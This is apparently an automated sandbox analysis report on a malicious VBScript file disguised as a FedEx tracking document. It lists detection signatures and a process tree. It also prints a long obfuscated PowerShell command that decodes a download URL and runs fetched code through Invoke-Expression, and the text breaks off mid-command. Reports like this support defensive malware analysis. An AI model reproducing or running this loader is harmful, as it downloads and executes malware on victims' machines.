Edit tour
Windows
Analysis Report
CR-FEDEX_TN-775537409198_Doc.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- wscript.exe (PID: 6228 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\CR-FE DEX_TN-775 537409198_ Doc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - PING.EXE (PID: 6732 cmdline:
ping googl e.com -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 4920 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 4500 cmdline:
ping %.%.% .% MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 7156 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7008 cmdline:
C:\Windows \system32\ cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6960 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6952 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Memoirer = 1;$Penn efjerene24 5='Substri n';$Pennef jerene245+ ='g';Funct ion Tabell ariske($As sessorerne 57){$Dekor ationernen dmarcherne 110=$Asses sorerne57. Length-$Me moirer;For ($Dekorati onerne=5; $Dekoratio nerne -lt $Dekoratio nernendmar cherne110; $Dekorati onerne+=(6 )){$Egebar k130+=$Ass essorerne5 7.$Pennefj erene245.I nvoke($Dek orationern e, $Memoir er);}$Egeb ark130;}fu nction Gde des($Ondog raph){. ($ Parkin) ($ Ondograph) ;}$Frieri= Tabellaris ke 'ForarM ChimeoSexo pzEmceiipi epolMyt.ol BundtaNaia d/ H gh5 C ,it.Af.en0 Drost Nabo g(EmissWC mplibve.sn ,ynadInsn ao Connw L ,cosEf.er BrugsNNona lT utb Sin d1 roer0Pa ros.Balka0 B,dri;.ram a TsarWD s bei,enitn N gl6borts 4energ;Ful da HistixT auri6 m da 4Kotur; S is DietarR allyvVeri, :Frems1P e li2Condy1z inco.Falte 0Eksam) St r. OminsGE mbedesaccu cmakkek Ev noAfgjo/M y.op2penci 0Malmh1 U, fe0Forew0P rste1Syntr 0St.ve1Fre mm BilfFGo .hii futur Bookse T.e cfNonc,oBe budxSe io/ Burd.1Colo r2Ibrug1 K niv.tel f0 Indu ';$T empestuous =Tabellari ske ',olar Umak,osBlo kaeU nigrG odst-Super A Spl,gUne leenarcin Salgtj,bga ';$Volow1 59=Tabella riske 'cab .ahGeno.tS hirttPedia pNedis:Fac .n/ Post/ PeaicFuraz rStuddyKid napDipleta ktivo .ine cApotehAqu ilrColanoJ omfrnDevel iA,axicFor udl Afpae tchbsUrteh .Inte.i Ye ddoPebfl/T rai mB.com gnon xbF.s sioadult1 Past/Mo.ph NBerneoNyt ten Un riL .gnenLjser sEsdratArb ejrS.steuS ve,dm Brid e,onzanInd kotW,undaH yinglA oni lOptniyBla aj. KeypqQ uarrxVelgr d,adde ';$ Baandvv=Ta bellariske 'Dolme>Sk ots ';$Par kin=Tabell ariske 'Pa ssiiElapie VicexOps. g ';$Sulev lling = Ta bellariske 'Cu che B reacOrdenh BeordoWald Si e%Ska .ra Fly.pN yh,dpSlump dd.mmea pl outCl imaA gerd%Tis.y \S,adspSyn dia ccenrC ompaa ,ton d rndbeBio ,erS,cari kottnYucke gToxiceBlo k rKhasanF erieeSekse .AdderSPro cttCabb eP ortu Unpro & Asso& Ca lf SteneGe mysc Eva h Kro oHard d resse$St .ep ';Gded es (Tabell ariske 'sp iro$Rea.cg Mytholover toL gnebHy peraArmodl Arres:Arb. jRKrtegoTe knosOprems PulveSemi bl Corrl.i bleifarman Rat fi Cav osHand,=Ve rek(Udstac EutopmSubc odgulvm No ti / Terrc abel Dupl i$BrainSTe rtiu ovolD rbyseHenle vBrsspl Gy ptlsouthi FundnInter g Stil)Jus ti ');Gded es (Tabell ariske 'Ap pea$Maharg Godmol nte roA,klebMu sicaConfel Yd rp:Poss ,eProc,kDu kkesK.ffep B.lene Tea tr BalatBe spalWhirri S.cren Pin ciHethie e nsn .nre=, picl$avlsd VThougo,he umlelen,oK vad wTopch 1Weeke5Inf er9Defer.b illasBefar pCecidlTek niiManu.tL euco(Hjem $,orplBAlo eraIncapaH a slnNaian dKollev Se mivScoa.)P ermi ');$V olow159=$e kspertlini en[0];Gded es (Tabell ariske 'Ma cro$ Skrmg BushwlAdel soAmfetbHv